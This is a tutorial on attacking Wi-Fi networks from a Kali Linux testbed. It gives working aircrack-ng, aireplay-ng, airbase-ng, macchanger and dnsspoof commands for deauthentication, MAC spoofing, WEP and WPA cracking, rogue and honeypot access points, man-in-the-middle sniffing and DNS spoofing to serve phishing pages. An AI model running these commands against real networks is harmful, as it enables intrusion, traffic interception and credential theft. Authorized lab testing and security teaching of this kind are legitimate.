Establishing a controlled wireless testbed requires specific hardware and software configurations to safely execute experiments. A penetration testing workstation running Kali Linux serves as the attacker machine, while a secondary device operates as the target. The infrastructure typically includes a wireless router capable of WEP/WPA/WPA2 configurations, a USB wireless adapter supporting packet injection and monitor mode, and a stable network connection. Kali Linux provides native support for most chipset drivers, but verifying hardware compatibility beforehand prevents workflow interruptions.
Testbed Configuration
Configure the wireless router to broadcast a custom SSID, such as TestNet, initially with open authentication to simplify initial connectivity testing. Connect the attacker machine via Ethernet to access the router's management interface, typically found at 192.168.0.1. Modify the SSID identifier and disable encryption temporarily. Save the configuration and reboot the router if required. Verify the broadcast by scanning available networks from the target device.
Insert the USB wireless adapter into the Kali machine. Identify the interface name using ip link show. Assuming the adapter initializes as wlan1, bring the interface online:
ip link set wlan1 up
ip addr show wlan1
Confirm the MAC address matches the adapter's hardware sticker. Kali automatically loads the necesary kernel modules for supported chipsets, eliminating manual driver compilation in most cases.
Connect to the test network using standard wireless utilities:
iwconfig wlan1 essid "TestNet"
iwconfig wlan1
Assign a static IP within the router's subnet and verify connectivity:
ip addr add 192.168.0.10/24 dev wlan1
ping -c 3 192.168.0.1
Successful ARP resolution and ICMP replies confirm the link is established.
Monitor Mode and Frame Inspection
Wireless security assessments rely on the ability to capture all traffic within range, regardless of the destination MAC address. This requires switching the adapter to monitor mode. Use the aircrack-ng suite to handle interface creation safely:
airmon-ng check kill
airmon-ng start wlan1 11
The command generates a monitor interface, typically mon1, locked to channel 11. Verify its status:
iwconfig mon1
Launch a packet analyzer to inspect the captured frames:
wireshark -k -i mon1 &
Wireless frames consist of management, control, and data types. Management frames handle authentication, association, and beaconing. Control frames manage medium access (RTS/CTS/ACK). Data frames carry the actual payload. Apply display filters in the packet analyzer to isolate specific traffic:
- Management frames:
wlan.fc.type == 0 - Control frames:
wlan.fc.type == 1 - Data frames:
wlan.fc.type == 2 - Beacon frames:
wlan.fc.type_subtype == 8
Unencrypted management and control frames transmit sensitive metadata in plaintext. Data payloads may be encrypted, but headers remain visible. This visibility enables passive reconnaissance and active frame injection.
Bypasssing Authentication Mechanisms
Hidden SSID Detection
Broadcasting SSIDs is optional. Administrators often disable beacon broadcasts to reduce visibility. However, client probe requests reveal the target network name when devices attempt to reconnect. Monitor probe responses to extract hidden identifiers:
tcpdump -i mon1 -nn -s 0 -w probe_capture.pcap wlan type mgt subtype probe-resp
If no active clients are present, force reassociation using deauthentication frames:
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 mon1
The attack disrupts active sessions, triggering clients to broadcast probe requests containing the SSID. Capture the exchange to retrieve the network identifier.
MAC Address Filtering
MAC filtering restricts access based on hardware addresses. Since wireless frames transmit source MAC addresses in plaintext, filters are trivial to bypass. Identify an authorized client using traffic analysis:
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 11 mon1
Once a valid client MAC is identified, spoof the adapter address:
macchanger -m 11:22:33:44:55:66 wlan1
ip link set wlan1 up
Reattempt association. The router accepts the spoofed address as legitimate, granting network access without credential verification.
Exploiting WEP and WPA/WPA2 Vulnerabilities
WEP Key Recovery
Wired Equivalent Privacy (WEP) relies on RC4 with a short initialization vector (IV), making it mathematically vulnerable. Successful exploitation requires capturing a sufficient volume of IVs. Initialize packet capture:
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 11 --write wep_capture mon1
Accelerate IV generation by replaying ARP requests:
aireplay-ng --arpreplay -b AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 mon1
Once data volume exceeds several thousand packets, initiate the cracking routine:
aircrack-ng wep_capture-01.cap
The tool analyzes IV collisions and derives the plaintext key. WEP keys are deterministic regardless of length, rendering the encryption obsolete.
WPA/WPA2 PSK Cracking
Wi-Fi Protected Access (WPA) replaces static keys with dynamic session encryption. Pre-Shared Key (PSK) networks are vulnerable to offline dictionary attacks targeting the four-way hendshake. Capture the handshake during client authentication:
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 11 --write wpa_capture mon1
Force a handshake capture by deauthenticating connected clients:
aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF mon1
Verify handshake capture in the capture file. Proceed with dictionary-based cracking:
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_capture-01.cap
Precomputing Pairwise Master Keys (PMK) accelerates the process. Generate a PMK file for the target SSID:
genpmk -f custom_wordlist.txt -d precomputed_pmk.db -s "TestNet"
Use optimized tools like Pyrit or aircrack-ng with the PMK database to reduce computational overhead during brute-force attempts.
Rogue Access Point Deployment
Deploying unauthorized access points allows traffic interception and network pivoting. Create a software-based AP using airbase-ng:
airbase-ng -e "CorporateNet" -c 6 -a AA:BB:CC:DD:EE:FF mon1 &
The tool spawns a virtual interface (at0). Bridge this interface with the wired network adapter to route traffic:
ip link add br-rogue type bridge
ip link set eth0 master br-rogue
ip link set at0 master br-rogue
ip link set br-rogue up
Enable IP forwarding and configure NAT if internet access is required:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Clients connecting to the rogue AP receive DHCP leases from the upstream network, granting the attacker full visibility into LAN traffic.
Client-Side Exploitation
Honeypot and ESSID Probing
Wireless clients continuously broadcast probe requests for previously connected networks. Create honeypot APs matching common enterprise or public SSIDs. Clients automatically associate if signal strength is sufficient. This technique facilitates credential harvesting and malware delivery without user interaction.
Caffe Latte and Bit-Flipping
Caffe Latte attacks target cached WEP keys on roaming clients. By spoofing an AP and capturing client ARP requests, an attacker can perform bitwise XOR operations on encrypted payloads to generate valid ARP responses. Repeated injection floods the network with IVs, enabling rapid WEP key recovery even when the legitimate AP is offline. Modern variants like Hirte extend this methodology to handle arbitrary frame types.
Advanced Traffic Manipulation
Man-in-the-Middle Positioning
Combining rogue AP deployment with traffic bridging creates a transparent MITM environment. All client traffic passes through the attacker's host, enabling deep packet inspection. Launch a sniffer on the virtual interface:
tcpdump -i at0 -w mitm_dump.pcap
Unencrypted HTTP credentials, session cookies, and internal service requests become immediately accessible.
DNS Spoofing and Session Hijacking
Intercept DNS queries to redirect traffic to attacker-controlled servers. Configure a host mapping file:
8.8.8.8 google.com
192.168.0.10 www.target-app.com
Launch the spoofing utility against the bridge interface:
dnsspoof -i br-rogue -f dns_hosts.txt
Requests to specified domains resolve to the attacker's IP. Combine with a local web server (python3 -m http.server 80) to serve phishing pages or capture authentication tokens. Tools like ettercap or mitmproxy further enhance content modification capabilities, allowing real-time HTML injection and cookie manipulation. Controlling the data link layer effectively compromises all higher-layer application protocols lacking transport encryption.